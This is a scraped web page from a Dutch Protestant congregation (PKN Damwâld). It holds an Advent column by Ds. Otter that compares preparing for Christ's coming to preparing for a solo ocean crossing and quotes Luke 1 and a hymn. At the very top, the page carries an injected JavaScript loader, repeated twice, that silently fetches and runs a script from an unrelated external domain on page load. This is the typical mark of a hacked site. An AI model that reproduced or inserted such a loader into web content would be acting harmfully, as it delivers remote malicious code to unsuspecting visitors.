;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bereid je voor - PKN Damwâld

Bereid je voor

Gepubliceerd op: woensdag 4 december 2019

Als je op reis gaat kost het soms heel wat voorbereiding. Wie alleen in een zeilboot de Atlantische Oceaan wil oversteken heeft een goede zeilboot nodig, navigatiemiddelen, genoeg voedsel voor onderweg, een goede stuurinstallatie om te kunnen slapen en een gezonde lichamelijke conditie. De accu’s moeten onderweg steeds weer opgeladen worden.  Je kan ook leren hoe anderen de reis ondernomen hebben. Uiteindelijk verzamel je de moed om op weg te gaan.

Voordat Jezus Christus naar deze wereld kwam bereidde God de Vader de komst voor. Oude en jonge mensen werden ingeschakeld en één van hen was Johannes de Doper. De engel die zijn vader Zacharias ontmoet in de tempel zegt het zo: “hij zal al van de moederschoot af met de Heilige Geest vervuld worden, en hij zal velen van de Israëlieten bekeren tot de Heere, hun God. En hij zal voor Hem uit gaan in de geest en de kracht van Elia … om voor de Heere een toegerust volk gereed te maken” (Lc.1, 15v ).  Toegerust voor wat? Om Jezus Christus te ontmoeten. De Koning komt – de Verlosser en met Hem breekt Gods Koninkrijk aan.

Met Gods Geest en Zijn kracht zal Johannes oproepen tot bekering.

Een tweede keer zal Jezus terugkomen. Opnieuw worden we opgeroepen om ons voor te bereiden. En opnieuw zijn Gods Heilige Geest en kracht nodig. Tegelijk is het geen solo zeiltocht. We hebben elkaar nodig om elkaar te bemoedigen en de hoop vast te houden.

Hoe zal ik U ontvangen,

hoe wilt Gij zijn ontmoet,

der wereld hoogst verlangen,

des harten heiligst goed?

Wil zelf uw fakkel dragen

in onze duisternis,

opdat wat U behage

ons klaar en zeker is.

Gez.117:1

Gezegende Advent toegewenst

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns